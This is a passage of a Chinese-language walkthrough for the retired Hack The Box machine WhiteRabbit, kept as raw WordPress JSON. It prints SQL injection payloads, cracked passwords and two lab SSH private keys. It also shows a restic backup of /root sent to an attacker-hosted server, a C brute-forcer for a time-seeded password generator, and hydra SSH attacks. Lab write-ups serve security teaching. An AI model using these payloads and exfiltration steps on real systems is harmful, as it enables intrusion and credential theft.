\u53d1\u73b0\u5f53\u524d\u6570\u636e\u5e93\u4e3aphishing<\/code>\u3002\u67e5\u770b\u6570\u636e\u5e93\u4e2d\u7684\u6240\u6709\u8868\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select count(distinct table_schema) from information_schema.tables)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select distinct table_schema from information_schema.tables limit 0,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select distinct table_schema from information_schema.tables limit 1,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select distinct table_schema from information_schema.tables limit 2,1)),1)-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\u6839\u636e\u7ed3\u679c\uff0c\u53d1\u73b0\u5b58\u57283<\/code>\u4e2a\u6570\u636e\u5e93\uff1ainformation_schema<\/code>\u3001phishing<\/code>\u548ctemp<\/code>\u3002\u73b0\u5728\u5c1d\u8bd5\u67e5\u770btemp<\/code>\u6570\u636e\u5e93\u5185\u7684\u8868\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select group_concat(distinct table_name) from information_schema.tables where table_schema='temp')),1)-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u53d1\u73b0\u8868temp.command_log<\/code>\uff01\u73b0\u5728\u67e5\u770b\u5176\u5b57\u6bb5\u540d\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select group_concat(distinct column_name) from information_schema.columns where table_schema='temp' and table_name='command_log')),1)-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\u53d1\u73b0\u8be5\u8868\u542b\u6709id<\/code>\u3001date<\/code>\u3001command<\/code>\u4e09\u4e2a\u5b57\u6bb5\u3002\u67e5\u8be2\u8868\u5185\u5b58\u5728\u591a\u5c11\u884c\u8bb0\u5f55\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select count(*) from temp.command_log)),1)-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\u53d1\u73b0\u8be5\u8868\u5185\u5b58\u57286<\/code>\u884c\u8bb0\u5f55\u3002\u73b0\u5728\u8f6c\u4e3a\u4f7f\u7528floor()<\/code>\u51fd\u6570\u8fdb\u884c\u62a5\u9519\u6ce8\u5165\uff0c\u83b7\u53d6\u8868\u5185\u6bcf\u4e00\u884cdate<\/code>\u548ccommand<\/code>\u5b57\u6bb5\u5185\u5bb9\uff1a<\/p>\n
{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 0,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 1,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,1,30) from temp.command_log limit 1,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,31,60) from temp.command_log limit 1,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 2,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,1,30) from temp.command_log limit 2,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,31,60) from temp.command_log limit 2,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 3,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 4,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" union select count(*),concat(floor(rand(0)*2),'(>)',(select concat_ws(' ',date,unix_timestamp(date),command) from temp.command_log limit 5,1)) x from information_schema.schemata group by x-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,1,30) from temp.command_log limit 5,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,31,60) from temp.command_log limit 5,1)),1)-- -\",\"message\":\"Clicked Link\"}\n{\"campaign_id\":1,\"email\":\"misaka19008@test.com\\\" and updatexml(1,concat(0x7e,(select substring(command,61,90) from temp.command_log limit 5,1)),1)-- -\",\"message\":\"Clicked Link\"}<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u83b7\u53d6\u4e86\u5982\u4e0b\u547d\u4ee4\u6267\u884c\u8bb0\u5f55\u53ca\u5176\u65f6\u95f4\u6233\uff1a<\/p>\n\n\n\n\n\n\n\n\n\n\n
\u65f6\u95f4<\/th>\n\u65f6\u95f4\u6233<\/th>\n\u547d\u4ee4\u5185\u5bb9<\/th>\n<\/tr>\n<\/thead>\n
2024-08-30 10:44:01<\/td>\n1725014641<\/td>\nuname -a<\/td>\n<\/tr>\n
2024-08-30 11:58:05<\/td>\n1725019085<\/td>\nrestic init --repo rest:http:\/\/75951e6ff.whiterabbit.htb<\/a><\/td>\n<\/tr>\n
2024-08-30 11:58:36<\/td>\n1725019116<\/td>\necho ygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw > .restic_passwd<\/td>\n<\/tr>\n
2024-08-30 11:59:02<\/td>\n1725019142<\/td>\nrm -rf .bash_history<\/td>\n<\/tr>\n
2024-08-30 11:59:47<\/td>\n1725019187<\/td>\n#thatwasclose<\/td>\n<\/tr>\n
2024-08-30 14:40:42<\/td>\n1725028842<\/td>\ncd \/home\/neo\/ && \/opt\/neo-password-generator\/neo-password-generator<\/td>\npasswd<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
\u9605\u8bfb\u547d\u4ee4\u6267\u884c\u8bb0\u5f55\uff0c\u53d1\u73b0\u9776\u673a\u7cfb\u7edf\u7ba1\u7406\u5458\u6267\u884c\u4e86restic<\/code>\u547d\u4ee4\uff0c\u5e76\u521b\u5efa\u4e86.restic_passwd<\/code>\u6587\u4ef6\uff0c\u4ee5\u53ca\u9776\u673aWeb<\/code>\u670d\u52a1\u5b58\u5728\u865a\u62df\u4e3b\u673a\u540d75951e6ff.whiterabbit.htb<\/code>\u3002\u901a\u8fc7\u8054\u7f51\u67e5\u8be2\uff0c\u53d1\u73b0restic<\/code>\u662f\u4e00\u4e2a\u8de8\u5e73\u53f0\u6570\u636e\u5907\u4efd\u5de5\u5177\uff1a<\/p>\n
\"\"<\/p>\n
\u67e5\u9605restic<\/code>\u5de5\u5177\u6587\u6863\uff1aRestoring from backup \u2014 restic 0.18.0 documentation<\/a>\uff0c\u53d1\u73b0\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u547d\u4ee4\u6062\u590d\u5e76\u4e0b\u8f7d\u9776\u673a\u7ba1\u7406\u5458\u7f13\u5b58\u5728Restic Web<\/code>\u670d\u52a1\u5668\u4e0a\u7684\u6700\u65b0\u6570\u636e\u5907\u4efd\uff1a<\/p>\n
restic -r rest:http:\/\/75951e6ff.whiterabbit.htb restore latest --target .\/restic_bak<\/code><\/pre>\n
\u76f4\u63a5\u6267\u884c\u8be5\u547d\u4ee4\uff0c\u968f\u540e\u8f93\u5165\u4fdd\u5b58\u5728\u6570\u636e\u5e93\u4e2d\u7684\u5907\u4efd\u5bc6\u7801\uff1aygcsvCuMdfZ89yaRLlTKhe5jAmth7vxw<\/code>\uff1a<\/p>\n
\"\"<\/p>\n
\u6210\u529f\u4e0b\u8f7d\u5907\u4efd\u6587\u4ef6bob.7z<\/code>\uff01\u67e5\u770b\u8be5\u6587\u4ef6\uff0c\u53d1\u73b0\u4e3a\u52a0\u5bc6\u538b\u7f29\u5305\uff0c\u76f4\u63a5\u8fdb\u884c\u5bc6\u7801\u54c8\u5e0c\u7206\u7834\uff1a<\/p>\n
7z2john bob.7z > bob_7z_hash.txt\njohn bob_7z_hash.txt --wordlist=\/usr\/share\/wordlists\/rockyou.txt<\/code><\/pre>\n
\"\"<\/p>\n
\u6210\u529f\u7834\u89e3\u538b\u7f29\u5305\u5bc6\u7801\uff1a1q2w3e4r5t6y<\/code>\uff01<\/p>\n
\u76f4\u63a5\u63d0\u53d6\u538b\u7f29\u5305\u6587\u4ef6bob<\/code>\uff0c\u53d1\u73b0\u4e3aSSH<\/code>\u79c1\u94a5\uff1a<\/p>\n
-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW\nQyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4wAAAJAQ+wJXEPsC\nVwAAAAtzc2gtZWQyNTUxOQAAACBvDTUyRwF4Q+A2imxODnY8hBTEGnvNB0S2vaLhmHZC4w\nAAAEBqLjKHrTqpjh\/AqiRB07yEqcbH\/uZA5qh8c0P72+kSNW8NNTJHAXhD4DaKbE4OdjyE\nFMQae80HRLa9ouGYdkLjAAAACXJvb3RAbHVjeQECAwQ=\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u968f\u540e\u5c1d\u8bd5\u4f7f\u7528\u7528\u6237\u540dbob<\/code>\u8fde\u63a5\u9776\u673a2222<\/code>\u7aef\u53e3\u7684SSH<\/code>\u670d\u52a1\uff1a<\/p>\n
ssh -i bob_ssh_key bob@10.10.11.63 -p 2222<\/code><\/pre>\n
\"\"<\/p>\n
\u767b\u5f55\u6210\u529f\uff01\uff01<\/strong><\/p>\n
\n
\u6743\u9650\u63d0\u5347<\/h1>\n
Docker\u5bb9\u5668\u9003\u9038<\/h2>\n
\u767b\u5f55SSH<\/code>\u540e\uff0c\u4f7f\u7528ls<\/code>\u547d\u4ee4\u67e5\u770b\u7cfb\u7edf\u6839\u76ee\u5f55\uff0c\u53d1\u73b0\u5b58\u5728.dockerenv<\/code>\u6587\u4ef6\uff0c\u5224\u65ad\u5f53\u524d\u4f4d\u4e8e\u9776\u673aDocker<\/code>\u5bb9\u5668\u5185\uff1a<\/p>\n
\"\"<\/p>\n
\u5c1d\u8bd5\u4f7f\u7528sudo -l<\/code>\u547d\u4ee4\u67e5\u770b\u5f53\u524d\u7528\u6237sudo<\/code>\u6743\u9650\uff1a<\/p>\n
\"\"<\/p>\n
\u53d1\u73b0\u5f53\u524d\u7528\u6237bob<\/code>\u53ef\u514d\u5bc6\u4ee5\u4efb\u610f\u7528\u6237\u8eab\u4efd\u8fd0\u884c\/usr\/bin\/restic<\/code>\u591a\u5e73\u53f0\u5907\u4efd\u5de5\u5177\u3002<\/p>\n
\u9605\u8bfbrestic<\/code>\u5de5\u5177\u8bf4\u660e\u6587\u6863\uff1aPreparing a new repository \u2014 restic 0.18.0 documentation<\/a>\uff0c\u53d1\u73b0\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528rest-server<\/code>\u5de5\u5177\u5728\u653b\u51fb\u673a\u4e0a\u67b6\u8bbe\u4e00\u4e2aRestic Web<\/code>\u5907\u4efd\u670d\u52a1\u3002\u5229\u7528\u8fd9\u79cd\u65b9\u6cd5\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u9776\u673a\u7684restic<\/code>\u5de5\u5177\u8fde\u63a5\u5230\u653b\u51fb\u673a\u6076\u610f\u7684Restic Web<\/code>\u670d\u52a1\uff0c\u521b\u5efa\u4e00\u4e2a\u5907\u4efd\u5206\u652f\uff0c\u5e76\u4e0a\u4f20\u4efb\u610f\u8def\u5f84\u7684\u6570\u636e\uff0c\u4f8b\u5982\/root<\/code>\u76ee\u5f55\u3002<\/p>\n
\u9996\u5148\uff0c\u6211\u4eec\u9700\u8981\u4e0b\u8f7drest-server<\/code>\u7a0b\u5e8f\uff1aRelease v0.13.0 \u00b7 restic\/rest-server<\/a>\uff0c\u5e76\u5728\u672c\u573080<\/code>\u7aef\u53e3\u67b6\u8bbe\u5907\u4efd\u670d\u52a1\uff1a<\/p>\n
.\/rest-server --path .\/rest_server_data --no-auth --listen 10.10.14.2:80<\/code><\/pre>\n
\u670d\u52a1\u67b6\u8bbe\u5b8c\u6bd5\u540e\uff0c\u4ee5sudo<\/code>\u6743\u9650\u6267\u884c\u9776\u673a\u7684restic<\/code>\u547d\u4ee4\uff0c\u5728\u653b\u51fb\u673a\u7684Restic Web<\/code>\u670d\u52a1\u4e0a\u521b\u5efa\u5907\u4efd\u5206\u652f\uff0c\u5e76\u6267\u884c\u5907\u4efd\/root<\/code>\u76ee\u5f55\u5230\u8fdc\u7a0b\u670d\u52a1\u7684\u547d\u4ee4\uff1a<\/p>\n
sudo restic init --repo rest:http:\/\/10.10.14.2\/\nsudo restic backup -r rest:http:\/\/10.10.14.2\/ \/root<\/code><\/pre>\n
\"\"<\/p>\n
\u5907\u4efd\u5bb9\u5668\/root<\/code>\u76ee\u5f55\u6210\u529f\uff01\u63a5\u4e0b\u6765\u9700\u8981\u4f7f\u7528\u653b\u51fb\u673arestic<\/code>\u5de5\u5177\u4ece\u672c\u5730Restic Web<\/code>\u670d\u52a1\u4e0b\u8f7d\u5907\u4efd\u7684\u6570\u636e\uff1a<\/p>\n
restic restore -r rest:http:\/\/10.10.14.2\/ latest --target .\/restic_bak<\/code><\/pre>\n
\"\"<\/p>\n
\u6570\u636e\u4e0b\u8f7d\u6210\u529f\uff01\u53d1\u73b0\/root<\/code>\u76ee\u5f55\u4e0b\u5b58\u5728\u540d\u4e3amorpheus<\/code>\u7684SSH<\/code>\u79c1\u94a5\u6587\u4ef6\uff1a<\/p>\n
-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS\n1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQS\/TfMMhsru2K1PsCWvpv3v3Ulz5cBP\nUtRd9VW3U6sl0GWb0c9HR5rBMomfZgDSOtnpgv5sdTxGyidz8TqOxb0eAAAAqOeHErTnhx\nK0AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBL9N8wyGyu7YrU+w\nJa+m\/e\/dSXPlwE9S1F31VbdTqyXQZZvRz0dHmsEyiZ9mANI62emC\/mx1PEbKJ3PxOo7FvR\n4AAAAhAIUBairunTn6HZU\/tHq+7dUjb5nqBF6dz5OOrLnwDaTfAAAADWZseEBibGFja2xp\nc3QBAg==\n-----END OPENSSH PRIVATE KEY-----<\/code><\/pre>\n
\u63a8\u6d4bmorpheus<\/code>\u4e3a\u5f53\u524d\u5bb9\u5668\u5bbf\u4e3b\u673a\u7684\u7528\u6237\u540d\uff0c\u76f4\u63a5\u4f7f\u7528\u8be5\u79c1\u94a5\u8fde\u63a5\u9776\u673a22<\/code>\u7aef\u53e3\u7684SSH<\/code>\u670d\u52a1\uff1a<\/p>\n
ssh -i morpheus_ssh_key morpheus@10.10.11.63<\/code><\/pre>\n
\"\"<\/p>\n
\u5bb9\u5668\u9003\u9038\u6210\u529f\uff01\uff01<\/strong><\/p>\n
\u9006\u5411\u5206\u6790\u5bc6\u7801\u8bbe\u7f6e\u7a0b\u5e8f\u8fd8\u539f\u5bc6\u7801<\/h2>\n
\u767b\u5f55morpheus<\/code>\u7528\u6237\u540e\uff0c\u6267\u884c\u76ee\u5f55\u4fe1\u606f\u6536\u96c6\uff0c\u5728\/opt\/neo-password-generator<\/code>\u76ee\u5f55\u4e0b\u53d1\u73b0\u4e86neo-password-generator<\/code>\u7a0b\u5e8f\uff1a<\/p>\n
\"\"<\/p>\n
\u7ed3\u5408\u524d\u9762\u5728\u6570\u636e\u5e93\u5185\u83b7\u53d6\u7684\u547d\u4ee4\u6267\u884c\u8bb0\u5f55\uff0c\u63a8\u65ad\u8be5\u7a0b\u5e8f\u4e3a\u91cd\u5927\u63d0\u6743\u7a81\u7834\u53e3\u3002\u76f4\u63a5\u4f7f\u7528scp<\/code>\u547d\u4ee4\u4e0b\u8f7d\u8be5\u7a0b\u5e8f\uff0c\u6253\u5f00IDA Pro<\/code>\uff0c\u52a0\u8f7d\u7a0b\u5e8f\u540e\u53cc\u51fbmain<\/code>\u51fd\u6570\uff0c\u6309F5<\/code>\u952e\u8fdb\u884c\u9006\u5411\u5206\u6790\uff1a<\/p>\n
scp -P 22222 \/opt\/neo-password-generator\/neo-password-generator megumin@10.10.14.2:\/home\/megumin\/Desktop\/neo-password-generator<\/code><\/pre>\n
\"\"<\/p>\n
\u8be5\u7a0b\u5e8f\u7ecf\u8fc7\u53d8\u91cf\u91cd\u547d\u540d\u7684\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
\/\/ .rodata:0000000000002008 aAbcdefghijklmn db 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789',0\n\nunsigned __int64 __fastcall generate_password(unsigned int current_time_bysecond_struct)\n{\n  int i; \/\/ [rsp+14h] [rbp-2Ch]\n  char password_string[24]; \/\/ [rsp+20h] [rbp-20h] BYREF\n  unsigned __int64 v4; \/\/ [rsp+38h] [rbp-8h]\n\n  v4 = __readfsqword(0x28u);\n  srand(current_time_bysecond_struct);\n  for ( i = 0; i <= 19; ++i )\n    password_string[i] = aAbcdefghijklmn[rand() % 62];\n  password_string[20] = 0;\n  puts(password_string);\n  return v4 - __readfsqword(0x28u);\n}\n\nint __fastcall main(int argc, const char **argv, const char **envp)\n{\n  struct timeval current_time_bysecond; \/\/ [rsp+10h] [rbp-20h] BYREF\n  unsigned __int64 v5; \/\/ [rsp+28h] [rbp-8h]\n\n  v5 = __readfsqword(0x28u);\n  gettimeofday(&current_time_bysecond, 0LL);\n  generate_password(1000 * LODWORD(current_time_bysecond.tv_sec) + current_time_bysecond.tv_usec \/ 1000);\n  return 0;\n}<\/code><\/pre>\n
\uff08\u6ce8\uff1achar<\/code>\u6570\u7ec4aAbcdefghijklmn<\/code>\u7684\u5185\u5bb9\u5e76\u672a\u5728\u4ee3\u7801\u4e2d\u660e\u6587\u5b9a\u4e49\uff0c\u800c\u662f\u5728\u7a0b\u5e8f\u6c47\u7f16\u4ee3\u7801\u7684\u6570\u636e\u533a\u88ab\u5b9a\u4e49\u7684\uff09<\/p>\n
\u901a\u8fc7\u9605\u8bfb\u4ee5\u4e0a\u4ee3\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u5206\u6790\u51fa\u8be5\u7a0b\u5e8f\u751f\u6210\u5bc6\u7801\u7684\u903b\u8f91\uff1a<\/p>\n
    \n
  1. \u7a0b\u5e8f\u542f\u52a8\u65f6\uff0c\u9996\u5148\u521d\u59cb\u5316\u4e00\u4e2atimeval<\/code>\u7ed3\u6784\u3002\u6839\u636e\u8054\u7f51\u67e5\u8be2\uff0c\u8be5\u7ed3\u6784\u7528\u4e8e\u5b58\u50a8\u7cfb\u7edf\u65f6\u95f4\u4fe1\u606f\u3002\u7ed3\u6784\u5185\u5b58\u5728tv.sec<\/code>\u548ctv.usec<\/code>\u4e24\u4e2a\u53d8\u91cf\uff0ctv.sec<\/code>\u5b58\u653e\u7684\u662f\u65f6\u95f4\u6233\uff0c\u7cbe\u5ea6\u4e3a\u79d2\uff0c\u53d8\u91cf\u7c7b\u578b\u4e3atime_t<\/code>\uff1b\u800ctv.usec<\/code>\u5b58\u653e\u7684\u662f\u67d0\u4e2a\u65f6\u523b\u7684\u5fae\u79d2\u503c\uff0c\u6700\u5927\u4f4d\u6570\u4e3a6<\/code>\u4f4d\u6574\u6570\uff0c\u53d8\u91cf\u7c7b\u578b\u4e3a\u666e\u901a\u6574\u6570int<\/code>\u3002<\/li>\n
  2. \u521d\u59cb\u5316\u53d8\u91cf\u7ed3\u675f\u540e\uff0c\u7a0b\u5e8f\u6267\u884c\u4e86gettimeofday()<\/code>\u65b9\u6cd5\uff0c\u5c06\u5f53\u524d\u65f6\u523b\u7684\u65f6\u95f4\u6233\u548c\u5fae\u79d2\u503c\u4fe1\u606f\u5199\u5165\u4e86timeval<\/code>\u7ed3\u6784\u3002\u63a5\u7740\u7a0b\u5e8f\u5c31\u8c03\u7528\u4e86generate_password<\/code>\u51fd\u6570\uff0c\u53c2\u6570\u4e3a\uff1atv_sec<\/code>\u65f6\u95f4\u6233\u503c\u4e58\u4ee51000<\/code>\u7684\u7ed3\u679c\u52a0\u4e0atv.usec<\/code>\u5fae\u79d2\u503c\u9664\u4ee51000<\/code>\u7684\u7ed3\u679c\u3002<\/li>\n
  3. generate_password()<\/code>\u65b9\u6cd5\u9996\u5148\u4f1a\u521d\u59cb\u5316\u6574\u6570\u5faa\u73af\u53d8\u91cfi<\/code>\u548c\u5b57\u7b26\u4e32\u6570\u7ec4password_string[24]<\/code>\uff0c\u63a5\u7740\u4f7f\u7528srand()<\/code>\u65b9\u6cd5\uff0c\u6839\u636e\u4f20\u5165\u53c2\u6570\u8bbe\u7f6e\u968f\u673a\u6570\u79cd\u5b50\uff1b\u968f\u540e\u4f7f\u7528rand()<\/code>\u751f\u6210\u968f\u673a\u6570\u5e76\u548c62<\/code>\u53d6\u4f59\uff0c\u5c06\u7ed3\u679c\u4f5c\u4e3aaAbcdefghijklmn<\/code>\u6570\u7ec4\u7684\u7d22\u5f15\u503c\uff0c\u628a\u6570\u7ec4\u5185\u5bf9\u5e94\u7684\u5b57\u7b26\u5730\u5740\u8d4b\u503c\u7ed9password_string<\/code>\u6570\u7ec4\u7684\u5bf9\u5e94\u4f4d\u7f6e\uff0c\u8be5\u64cd\u4f5c\u5c06\u5faa\u73af20<\/code>\u6b21\uff0c\u5faa\u73af\u7ed3\u675f\u540e\uff0c\u5c06\u7ed3\u5c3e\u7684password_string[20]<\/code>\u8bbe\u7f6e\u4e3aNULL<\/code>\uff0c\u7ed3\u675f\u5b57\u7b26\u4e32\u5e76\u6253\u5370\u5230\u7ec8\u7aef\u4e0a\u3002<\/li>\n<\/ol>\n
    \u6839\u636e\u4eceMySQL<\/code>\u6570\u636e\u5e93\u4e2d\u83b7\u53d6\u7684\u547d\u4ee4\u6267\u884c\u8bb0\u5f55\uff0c\u53ef\u4ee5\u786e\u5b9a\u7cfb\u7edf\u7ba1\u7406\u5458\u6267\u884c\u5bc6\u7801\u4fee\u6539\u547d\u4ee4\u65f6\u7684\u65f6\u95f4\u6233\u503ctv_sec<\/code>\u503c\u4e3a1725028842<\/code>\uff0c\u4f46\u8be5\u65f6\u95f4\u6233\u53ea\u670910<\/code>\u4f4d\uff0c\u7cbe\u5ea6\u53ea\u4e3a\u79d2\uff0c\u5e76\u672a\u5305\u542b\u4ee5\u5fae\u79d2\u4e3a\u5355\u4f4d\u7684\u65f6\u95f4\u4fe1\u606f\u3002\u5bf9\u4e8e\u8fd9\u79cd\u60c5\u51b5\uff0c\u6211\u4eec\u53ef\u4ee5\u5c1d\u8bd5\u7f16\u5199C<\/code>\u7a0b\u5e8f\uff0c\u4ee51<\/code>\u6beb\u79d2\uff081000<\/code>\u5fae\u79d2\uff09\u4e3a\u4e00\u4e2a\u5faa\u73af\u5355\u4f4d\uff0c\u8bbe\u7f6etv_usec<\/code>\u7684\u503c\uff0c\u5e76\u6839\u636e\u7a0b\u5e8f\u903b\u8f91\u751f\u6210\u5bc6\u7801\u5b57\u5178\u3002POC<\/code>\u7a0b\u5e8f\u6e90\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n
    #include<time.h>\n#include<stdio.h>\n#include<stdlib.h>\n\nvoid generate_password(unsigned int modified_timestamp) {\n    char password_string[24];\n    char aAbcdefghijklmn[62] = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\";\n\n    srand(modified_timestamp);\n    for (int i = 0; i <= 19; ++i)\n        password_string[i] = aAbcdefghijklmn[rand() % 62];\n    password_string[20] = '\\0';\n    puts(password_string);\n}\n\nint main() {\n    int tv_usec;\n    int tv_sec = 1725028842;\n\n    for (int i = 0; i < 1000000; i = i + 1000) {\n        tv_usec = i;\n        generate_password(tv_sec * 1000 + tv_usec \/ 1000);\n    }\n    return 0;\n}<\/code><\/pre>\n
    \u4f7f\u7528gcc<\/code>\u7f16\u8bd1\u4ee5\u4e0a\u4ee3\u7801\uff0c\u8d4b\u4e88\u6267\u884c\u6743\u9650\u540e\uff0c\u6267\u884c\u7a0b\u5e8f\uff0c\u5c06\u8f93\u51fa\u91cd\u5b9a\u5411\u81f3sys_pass.lst<\/code>\u6587\u4ef6\uff1a<\/p>\n
    gcc generate_pass.c -o generate_pass.elf\nchmod +x generate_pass.elf\n.\/generate_pass.elf > sys_pass.lst<\/code><\/pre>\n
    \u751f\u6210\u5b8c\u6bd5\u540e\uff0c\u4f7f\u7528hydra<\/code>\u5de5\u5177\u7206\u7834neo<\/code>\u7528\u6237\u5bc6\u7801\uff1a<\/p>\n
    hydra -l neo -P sys_pass.lst -t 60 -f ssh:\/\/10.10.11.63<\/code><\/pre>\n
    \"\"<\/p>\n
    \u6210\u529f\u53d1\u73b0\u7528\u6237\u51ed\u636e\uff1a<\/p>\n
      \n
    • \u7528\u6237\u540d\uff1aneo<\/code><\/li>\n
    • \u5bc6\u7801\uff1aWBSxhWgfnMiclrV4dqfj<\/code><\/li>\n<\/ul>\n
      \u76f4\u63a5\u767b\u5f55SSH<\/code>\uff1a<\/p>\n
      \"\"<\/p>\n
      \u6210\u529f\uff01<\/p>\n
      \u5229\u7528\u4efb\u610fsudo\u6743\u9650\u5207\u6362root\u7528\u6237<\/h2>\n
      \u767b\u5f55neo<\/code>\u7528\u6237\u540e\uff0c\u4f7f\u7528sudo -l<\/code>\u547d\u4ee4\u67e5\u770b\u5f53\u524d\u7528\u6237sudo<\/code>\u6743\u9650\uff1a<\/p>\n
      \"\"<\/p>\n
      \u53d1\u73b0\u5f53\u524d\u7528\u6237\u53ef\u4ee5\u901a\u8fc7sudo<\/code>\uff0c\u4ee5\u4efb\u610f\u7528\u6237\u8eab\u4efd\u6267\u884c\u4efb\u610f\u547d\u4ee4\u3002\u76f4\u63a5\u5207\u6362\u81f3root<\/code>\u5373\u53ef\uff1a<\/p>\n
      sudo su -<\/code><\/pre>\n
      \"\"<\/p>\n
      \u63d0\u6743\u6210\u529f\uff01\uff01\uff01\uff01<\/strong><\/p>\n
      \n
      \u672c\u6b21\u9776\u673a\u6e17\u900f\u5230\u6b64\u7ed3\u675f<\/h1>\n
      \n","protected":false},"excerpt":{"rendered":"
      \u76ee\u6807\u4fe1\u606f IP\u5730\u5740\uff1a10.10.11.63 \u4fe1\u606f\u6536\u96c6 ICMP\u68c0\u6d4b PING 10.10.11.63 (10.10.11.63)  …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"","_seopress_titles_desc":"","_seopress_robots_index":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[3,14],"tags":[],"class_list":["post-244","post","type-post","status-publish","format-standard","hentry","category-htb_retired","category-linux_machines"],"_links":{"self":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/244","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/comments?post=244"}],"version-history":[{"count":3,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/244\/revisions"}],"predecessor-version":[{"id":247,"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/posts\/244\/revisions\/247"}],"wp:attachment":[{"href":"https:\/\/www.misaka19008-lab.icu\/index.php\/wp-json\/wp\/v2\/media?parent=244"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href"